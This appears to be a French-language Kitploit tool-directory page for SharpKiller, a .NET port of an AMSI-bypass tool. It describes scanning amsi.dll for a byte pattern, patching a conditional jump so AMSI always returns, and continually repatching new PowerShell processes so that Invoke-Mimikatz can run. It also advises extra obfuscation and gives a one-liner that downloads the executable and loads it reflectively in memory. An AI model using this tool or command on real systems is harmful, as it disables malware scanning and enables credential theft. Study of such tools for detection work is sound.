Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharpKiller — Bypass AMSI permanent par @ZeroMemoryEx porté vers .NET Framework 4.8 | Kitploit
Outils/GitHubGitHub/s1lkys/sharpkiller
Escalade de PrivilègesExploitationÉvasion IDS/IPSPost-ExploitationRed TeamingDéveloppement de Charges Utiles
GitHubs1lkys/sharpkiller

SharpKiller

Bypass AMSI permanent par @ZeroMemoryEx porté vers .NET Framework 4.8

Voir le dépôt
351432il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SharpKiller

Bypass AMSI à vie AMSI-Killer par @ZeroMemoryEx porté vers .NET Framework 4.8.

Obfuscation supplémentaire requise

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:MSIL/SharpKiller.A&ThreatID=2147895059

Nouvelles fonctionnalités intégrées :

[ x ] - Analyse en direct des nouveaux processus powershell toutes les 0.5 secondes -> Corrige automatiquement les nouvelles instances powershell

Construction de la solution

  • Définissez explicitement votre plateforme sur x64 dans Build > configuration manager

Comment ça marche ?

Scan d'opcode

  • nous obtenons l'adresse exacte de l'instruction de saut en recherchant le premier octet de chaque instruction ; cette technique est efficace même face à des mises à jour ou modifications de l'ensemble de données cible.

  • par exemple :

    | 48:85D2 | test rdx, rdx |

    | 74 3F | je amsi.7FFAE957C694 |

    | 48 : 85C9 | test rcx, rcx |

    | 74 3A | je amsi.7FFAE957C694 |

    | 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |

    | 74 33 | je amsi.7FFAE957C694 |

  • le motif de recherche sera comme ceci :

    { 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}

    image

Correctif

Avant le correctif

  • Le programme teste la valeur de RDX contre elle-même. Si la comparaison donne 0, le programme effectue un saut pour revenir. Sinon, le programme évalue l'instruction suivante

    image

  • nous ne pouvons pas exécuter "Invoke-Mimikatz"

    image

Après le correctif

  • nous corrigeons le premier octet et le changeons de JE à JMP pour qu'il retourne directement

    Screenshot 2023-02-26 195848

    image

  • maintenant nous pouvons exécuter "Invoke-Mimikatz"

Nouveaux processus créés

  • Sharp-Killer corrigera tout nouveau processus Powershell créé en quasi temps réel.

Démonstration vidéo

video

OneLiner pour exécuter avec reflection

root@kitploit:~
$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));

Cette erreur se produit lors de l'utilisation du OneLiner mentionné ?

Si vous avez déjà vu ce message et vous êtes demandé ce qu'il signifie - bienvenue dans l'interface AMSI .NET ! :-)

root@kitploit:~
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."
  • https://s3cur3th1ssh1t.github.io/Powershell-and-the-.NET-AMSI-Interface/

Références :

  • https://github.com/ZeroMemoryEx/Amsi-Killer
Télécharger l’outil